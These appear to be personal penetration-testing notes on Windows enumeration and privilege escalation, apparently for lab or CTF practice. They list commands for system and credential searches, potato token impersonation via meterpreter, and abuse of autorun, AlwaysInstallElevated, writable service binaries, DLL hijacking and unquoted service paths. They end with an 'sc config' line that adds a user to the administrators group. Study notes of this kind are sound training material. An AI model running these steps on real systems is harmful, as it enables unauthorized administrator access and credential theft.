Windows Enum and Priv-Esc

Windows Privilege-Escalation

Automated tooling exists:

• PowerUp
• seatbelt

Enumeration

Manual Enumeration

Let’s start with system information

systeminfo
systeminfo | findstr /b /c:"OS Name" /c:"OS Versoin" /c:"System Type"
wmic qfe
wmic qfe Caption,Description,HotFixID,InstalledOn
wmic logicaldisk
wmic logicaldisk get caption,description,providername
wmic logicaldisk get caption

Then get some information about the current user, their privileges and groups; and about all available users and groups:

wohami
whoami /priv
whoami /groups
net user
net user user
net localgroup group

Network Information:

ipconfig # check for multi-homed machines
ipconfig /all
arp -a
route print
netstat -ano

Search for passwords

findstr /si password *.txt *.ini *.config

Anti-Virus Enumeration

sc query windefend
sc queryex type= service
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config

Automated Enumeration/Tools

There are multiple automated enumeration tools

• winPEAS
• seatbelt

Some unmaintained (or outdated projects): sherlock.ps1, watson, jaws-enum.ps1

Privilege Escalation

Automated Tooling

• powerup (not maintained anymore)/sharpup
• windows-exploit-suggester.py, exploit suggester (metasploit)
• powershell → run post/multi/recon/local_exploit_suggester
• metasploit getsystem
  • a named pipe + in-memory dll
  • a named pipe + drops a dll to the disk
  • token impersonation

windows kernel exploits

• https://github.com/SecWiki/windows-kernel-exploits
• maybe use metasploit for this

Impersonation and Potato Attacks (jeeves)

• whoami /priv

• use mimikatz, etc. to show tokens

• meterpreter → getprivs

• priv2admin → https://github.com/gtworek/Priv2Admin

• if we have SeAssignPrimaryToken → we can do PotatoAttacks (oder SeImpersonatePrivilege)

  • https://foxglovesecurity.com/2016/01/16/hot-potato/

• potato attacks

  • creates a new token
  • then impersonate this token
  • mostly works for service accounts

• windows-expoit-suggester.py

  • check for *potato

• do the same form meterpreter

  • run post/multi/recon/local_exploit_suggester
  • use windows/local/ms16_075_reflection
  • run
  • load incognito
  • list_tokens -u
  • impersonate_token

registry exploits

autorun feature

# use sysinternals autorun64
 
# or: replace found program with meterpreter reverse shell
accesschk64 -wvu "c:\program files\autorun programs"
 
# powerup.ps1/sharpup
Invoke-AllChecks

alwaysinstall elevated

• reg query HKLM\Software\Policies\Microsoft\Windows\Installer'
• user msfvenom to create a new payload → just create a msi instead of an exe payload

regsrv escalation

• Get-Alc -Path search for regsvc interactive
• regsvc → FullControl allowed
• compile a new service
• install it with reg add
• sc start regsvc

executable files as a service

# again we can use powerup/shartup for scanning
invoke-allcheck
 
# or manually check
accesschk64 -wvu "c:\program files\file permissions service" RW FILE_ALL_ACCESS

• replace current binary with backdoor
• sc start filepermservice

startup applications

• icacls.exe "c:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
• replace file
• logout and login to execute the payload

DLL hijacking

• search for an executable that uses a DLL
• run procmon.exe
  • add filter: “result is NAME NOT FOUND”
    • and “PATH ends with .dll”
  • now search for something where we can write to
• windows_dll.c source code for creating a service
  • could use msfvenom for this too

service permissions (path)

• unquoted service paths

accesschk64 -wuvc Everyone *
accesschk64 -wuvc daclsvc
# CHANGE_CONFIG, STOP, START
sc qc daclsvc -> BINARY_PATH_NAME
sc config daclsvc binpath="net localgroup administrators user /add"